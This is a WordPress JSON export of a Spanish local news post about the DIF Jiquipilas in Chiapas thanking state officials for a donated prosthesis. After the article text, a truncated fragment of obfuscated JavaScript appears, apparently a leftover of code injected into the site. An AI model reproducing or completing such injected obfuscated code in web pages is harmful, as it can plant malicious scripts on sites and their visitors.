{"id":5232,"date":"2022-09-20T02:42:33","date_gmt":"2022-09-20T02:42:33","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5232"},"modified":"2022-09-20T02:42:33","modified_gmt":"2022-09-20T02:42:33","slug":"jiquipilas-beneficiado-con-la-tercera-entrega-de-protesis-2022","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5232","title":{"rendered":"Jiquipilas beneficiado con la tercera entrega de Pr\u00f3tesis 2022"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"908\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220919-WA0032-908x1024.jpg\" alt=\"\" class=\"wp-image-5233\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220919-WA0032-908x1024.jpg 908w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220919-WA0032-266x300.jpg 266w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220919-WA0032-768x866.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220919-WA0032.jpg 1085w\" sizes=\"auto, (max-width: 908px) 100vw, 908px\" \/><\/figure>\n\n\n\n<p>\u2022 Madely Montejo presidenta del sistema DIF Jiquipilas agradeci\u00f3 al gobernador Rutilio Escand\u00f3n y Deliamar\u00eda Gonz\u00e1lez por beneficiar al municipio con estos apoyos. <\/p>\n\n\n\n<p>\u2022 Edgar Paredes Cruz fue beneficiado con pr\u00f3tesis.<\/p>\n\n\n\n<p>19 de Septiembre del 2022. Jiquipilas, Chiapas. La presidenta del sistema para el desarrollo integral de la familia Madely Montejo Maza, agradeci\u00f3 al gobernador del estado, Rutilio Escand\u00f3n Cadenas y a Delimaria Gonz\u00e1lez Flandes, directora general del DIF Chiapas por apoyar a Jiquipilas con la donaci\u00f3n de una pr\u00f3tesis.  \u201cTodo es posible gracias a la entrega y dedicaci\u00f3n de nuestro gobernador Rutilio Escand\u00f3n Cadenas que ha sido un gran aliado de las familias jiquipiltecas y que hoy una vez m\u00e1s lo demuestra al entregar 54 pr\u00f3tesis a chiapanecos y chiapanecas, Jiquipilas no fue la excepci\u00f3n y nuestro amigo Edgar fue beneficiado\u201d, se\u00f1al\u00f3 Madely Montejo.  Se\u00f1al\u00f3 que la delegaci\u00f3n regional a cargo de Hiram Mancilla Moreno ha respaldado y unido esfuerzos con el DIF Jiquipilas lo que ha logrado grandes beneficios para las y los jiquipiltecos.  \u201cagradezco el compromiso, dedicaci\u00f3n y responsabilidad con la que d\u00eda a d\u00eda se desempe\u00f1a nuestra directora general del DIF Chiapas, Deliamaria Gonz\u00e1lez Flandez, una mujer que est\u00e1 trabajando fuertemente para llevar m\u00e1s apoyos y beneficios a las familias chiapanecas, nuestro agradecimiento a nombre del pueblo jiquipilteco.  Por \u00faltimo, la presidenta del DIF Madely Montejo Maza refrend\u00f3 su compromiso con las familias del municipio para seguir tocando puertas para lograr m\u00e1s apoyos y beneficios, destac\u00f3 que las puertas del DIF est\u00e1n abiertas para toda la ciudadan\u00eda.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Madely Montejo presidenta del sistema DIF Jiquipilas agradeci\u00f3 al gobernador Rutilio Escand\u00f3n y Deliamar\u00eda Gonz\u00e1lez por beneficiar al municipio con estos apoyos. \u2022 Edgar Paredes Cruz fue beneficiado con pr\u00f3tesis. 19 de Septiembre del 2022. Jiquipilas, Chiapas. La presidenta del sistema para el desarrollo integral de la familia Madely Montejo Maza, agradeci\u00f3 al gobernador &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5233,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-5232","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5232","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5232"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5232\/revisions"}],"predecessor-version":[{"id":5234,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5232\/revisions\/5234"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5233"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5232"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5232"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5232"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}